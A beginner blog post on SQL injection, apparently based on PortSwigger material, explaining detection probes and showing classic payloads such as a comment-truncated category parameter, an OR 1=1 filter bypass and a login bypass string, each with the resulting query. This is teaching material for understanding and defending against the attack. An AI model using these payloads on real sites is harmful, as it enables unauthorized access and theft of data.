DEV Community

Golam_Mostafa
Golam_Mostafa

Posted on

SQL Injection (SQLi)

SQL Injection (SQLi) is a trick used by hackers to mess with websites. They add fake input into forms or URLs to access or steal data from a website's database.

How to Spot SQL Injection

  1. Single Quotes (''): Enter a single quote (') in a form or URL. If you see an error, the website might be vulnerable.
  2. Always True Condition: Try entering OR 1=1 (always true) or OR 1=2 (always false) and see if the site behaves differently.
  3. Delays: Use commands like SLEEP(5) to see if the page takes longer to load.
  4. External Calls: Test if your input makes the site connect to another server.

Example: Finding Hidden Items

For example:

https://example.com/products?category=Gifts
Enter fullscreen mode Exit fullscreen mode

The site might use this command to get the products:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1;
Enter fullscreen mode Exit fullscreen mode

This hides unreleased items (released = 1 shows only ready products).

What Hackers Do:

They can change the URL to:

https://example.com/products?category=Gifts'--
Enter fullscreen mode Exit fullscreen mode

This changes the database query to:

SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1;
Enter fullscreen mode Exit fullscreen mode

The -- ignores the rest of the query, showing all products, even hidden ones.

Example: Show Everything

Hackers can show all items, even unknown categories, by using:

https://example.com/products?category=Gifts'+OR+1=1--
Enter fullscreen mode Exit fullscreen mode

This creates a query like:

SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1;
Enter fullscreen mode Exit fullscreen mode

Since 1=1 is always true, the database returns everything.

Example: Hacking a Login

Think of a login form that checks username and password. Normally, it might do this:

SELECT * FROM users WHERE username = 'user' AND password = 'pass';
Enter fullscreen mode Exit fullscreen mode

A hacker can enter this as the username:

user' OR '1'='1
Enter fullscreen mode Exit fullscreen mode

The query becomes:

SELECT * FROM users WHERE username = 'user' OR '1'='1' AND password = 'pass';
Enter fullscreen mode Exit fullscreen mode

Since 1=1 is always true, the hacker logs in without a password.

Be Careful

Testing SQLi is risky. Commands like OR 1=1 might delete or change important data if misused. Always handle websites and data responsibly.

To stay safe, websites must properly check user inputs and use secure coding practices.

Acknowledgment: This document references information from PortSwigger Web Security and ChatGPT.

Top comments (0)

Read next

aleksanderpalamar profile image

O Caminho Definitivo para Desenvolvedores Iniciantes: Como a Programação e o Linux Podem Transformar Sua Carreira

Aleksander Palamar -

joinwithcandie profile image

What Role Does Blockchain Play in Ensuring Transparency in AI-Generated Content?

Angelika Candie -

tecvanfe profile image

In-depth Review of Cursor: Revolutionary Productivity Tool or Overhyped Toy?

tecvan -

tech_tales_daa8a7eab515b3 profile image

Flutter 3.27: Wrapping Up the Year with Innovation and Progress

Tech Tales -